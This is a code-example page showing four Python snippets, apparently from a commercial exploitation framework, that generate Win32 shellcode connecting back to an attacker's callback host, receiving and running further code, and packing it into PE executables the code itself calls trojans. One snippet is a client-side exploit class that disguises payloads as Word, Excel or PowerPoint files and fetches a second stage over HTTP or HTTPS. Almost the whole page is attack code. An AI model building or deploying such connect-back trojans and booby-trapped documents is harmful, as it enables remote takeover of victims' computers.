Пример #1
0
    def getWinShellcode(self):
        trojan = ''
        try:
            sc = shellcodeGenerator.win32()
            sc.addAttr('findeipnoesp', {'subespval': 0})
            sc.addAttr('revert_to_self_before_importing_ws2_32',
                       {"win8_compatible": True})
            sc.addAttr('tcpconnect', {
                'port': self.callback.port,
                'ipaddress': self.callback.ip
            })

            mosdef_type = self.engine.getMosdefType(
                canvasengine.WIN32MOSDEF_INTEL)
            mosdef_id = self.engine.getNewMosdefID(self)
            sc.addAttr("send_universal", {
                "mosdef_type": mosdef_type,
                "mosdef_id": mosdef_id
            })
            sc.addAttr("RecvExecDepSafe", {'socketreg': 'FDSPOT'})
            sc.addAttr("ExitThread", None)
            sc.vAllocSelf = True  #we need to move to another page!

            myPElib = pelib.PElib()
            trojan = myPElib.createPEFileBuf(sc.get())

        except:
            import traceback
            traceback.print_exc(file=sys.stderr)

        self.shellcode = trojan
        return self.shellcode
Пример #2
0
    def makedownloadfile(self):
        """Makes the trojan code file"""

        import pelib
        p = pelib.PElib()
        imports = [ ("advapi32.dll", ["RevertToSelf", "AccessCheck"]), ("urlmon.dll", ["URLDownloadToFileA", "FindMediaType" ]) ] 
        filedata = p.createPEFileBuf(self.shellcode, imports)
        #filedata=file("extras/testvuln1.exe","rb").read()
        #filedata+="\r\n\r\n"
        return filedata
Пример #3
0
    def createShellcode(self):
        sc=shellcodeGenerator.win32()                                                                                        
        sc.addAttr("findeipnoesp",{"subespval": self.subesp}) #don't mess with eip
        sc.addAttr("revert_to_self_before_importing_ws2_32", None)
        sc.addAttr("tcpconnect",{"port":self.callback.port,"ipaddress":self.callback.ip})                                                              
        sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
        sc.addAttr("ExitThread",None)

        rawshellcode=sc.get()
        
        print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode)
        
        pe = pelib.PElib()
        self.shellcode = pe.createPEFileBuf(rawshellcode)
        
        return self.shellcode
Пример #4
0
class theexploit(httpclientside):
    def __init__(self):
        httpclientside.__init__(self)

        self.setVersions()
        self.version = 1
        self.clientversion = None
        self.name = NAME
        self.filename = None
        self.exefile = None

    def displayVersions(self):
        for v in self.versions.keys():
            print "Version %d: %s" % (v, self.versions[v][0])

    def setVersions(self):
        self.versions = {}
        #name
        self.versions[1] = ("MS Word file", None)
        self.versions[2] = ("MS Excel file", None)
        self.versions[3] = ("MS Powerpoint file", None)

    def neededListenerTypes(self):
        from canvasengine import WIN32MOSDEF
        return [WIN32MOSDEF]

    def createShellcode(self):
        from shellcode import shellcodeGenerator
        httpWrapper = ""
        try:
            if self.HTTPMOSDEF == True:
                self.log("[!] using HTTP MOSDEF tunneling payload ..")
                sc = shellcodeGenerator.win32()
                sc.addAttr("findeipnoesp", {"subespval": 0x1000})
                sc.addAttr("revert_to_self_before_importing_ws2_32", None)

                # this is what you need your exploits to port them to HTTPS MOSDEF compatibility
                if self.useSSLMOSDEF == True:
                    ssl = "s"
                else:
                    ssl = ""
                # end of change

                sc.addAttr(
                    "httpGetShellcode", {
                        "URL":
                        "http%s://%s:%d" %
                        (ssl, self.callback.ip, self.callback.port)
                    })
                httpWrapper = sc.get()
                self.log("[!] HTTP MOSDEF len: %d bytes" % len(httpWrapper))
        except Exception, msg:
            #print "Exception in HTTP MOSDEF Payload generation: %s" % msg
            httpWrapper = ""

        self.shellcode = self.createInjectToSelf(self.callback.ip,
                                                 self.callback.port,
                                                 injectme=httpWrapper)
        self.log("Callback Host/Port: %s/%s" %
                 (self.callback.ip, self.callback.port))
        pe = pelib.PElib()
        self.shellcode = pe.createPEFileBuf(self.shellcode)

        return self.shellcode